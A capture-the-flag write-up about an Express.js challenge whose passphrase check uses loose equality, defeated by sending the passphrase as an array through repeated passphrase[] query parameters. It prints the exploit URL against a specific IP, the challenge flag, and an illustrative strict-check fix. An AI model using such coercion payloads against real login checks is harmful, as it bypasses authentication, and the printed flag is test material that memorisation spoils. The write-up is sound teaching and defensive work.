Coney Island Hackers
Challenge
Coney Island Hackers have a secret web portal.
Using advanced social engineering techniques, you found out their secret passphrase: eat,sleep,hack,repeat. However, it seems to take more than just entering the passphrase as-is. Can you find out what?
http://46.101.107.117:2202
Solution
if (req.query.passphrase == 'eat,sleep,hack,repeat')
This hint was super unhelpful at first; eventually I fetched the HEAD of the website:
$ curl -I http://46.101.107.117:2202/?passphrase=eat,sleep,hack,repeat
HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 609
ETag: W/"261-eAa/QxeLx6CjmYOc9KnGojwfNKY"
Date: Thu, 05 May 2022 16:20:04 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Ahh, Express JS. After some super sleuthing (i.e. googling "express nodejs form password check ctf hack"), I found this article which had a URL with split-up password fields. This answered it for me: we need to pass in the passphrase as multiple elements, like a list. In the old PHP days I remember seeing that quite often with ?param[]=value&param[]=value2
Which, given the JavaScript behaviour of stringifying lists for comparison by helpfully adding commas:
[1,2,3,4].toString()
"1,2,3,4"
means that’s how we solve it without commas:
http://46.101.107.117:2202/?passphrase[]=eat&passphrase[]=sleep&passphrase[]=hack&passphrase[]=repeat
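The comparison from the hint next to a stricter one, as an added example that is not part of the original write-up or the challenge's own code. parseQuery is a simplified stand-in for qs-style query parsing that turns repeated name[] keys into an array; the function names and sample inputs are constructed for illustration.

```javascript
// Simplified stand-in (assumption) for qs-style bracket parsing:
// repeated "name[]" keys are collected into one array under "name".
function parseQuery(search) {
  const out = Object.create(null); // no inherited keys to collide with
  for (const [rawKey, value] of new URLSearchParams(search)) {
    const isList = rawKey.endsWith('[]');
    const key = isList ? rawKey.slice(0, -2) : rawKey;
    if (isList) {
      if (!Array.isArray(out[key])) out[key] = [];
      out[key].push(value);
    } else {
      out[key] = value;
    }
  }
  return out;
}

const SECRET = 'eat,sleep,hack,repeat';

// The check from the hint: == coerces an array operand with toString(),
// which joins its elements with commas before the comparison.
function looseCheck(query) {
  return query.passphrase == SECRET;
}

// Hardened check: require a string first, then compare without coercion.
function strictCheck(query) {
  return typeof query.passphrase === 'string' && query.passphrase === SECRET;
}

// Constructed sample inputs (same shapes as the two URLs in this write-up).
const asString = parseQuery('?passphrase=eat,sleep,hack,repeat');
const asArray = parseQuery(
  '?passphrase[]=eat&passphrase[]=sleep&passphrase[]=hack&passphrase[]=repeat');

console.log('array  -> loose:', looseCheck(asArray), 'strict:', strictCheck(asArray));
console.log('string -> loose:', looseCheck(asString), 'strict:', strictCheck(asString));
```

Validating the type of every query parameter before using it closes this class of bug regardless of how the comparison is written.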
Flag
he2022{el_dorado_arkade}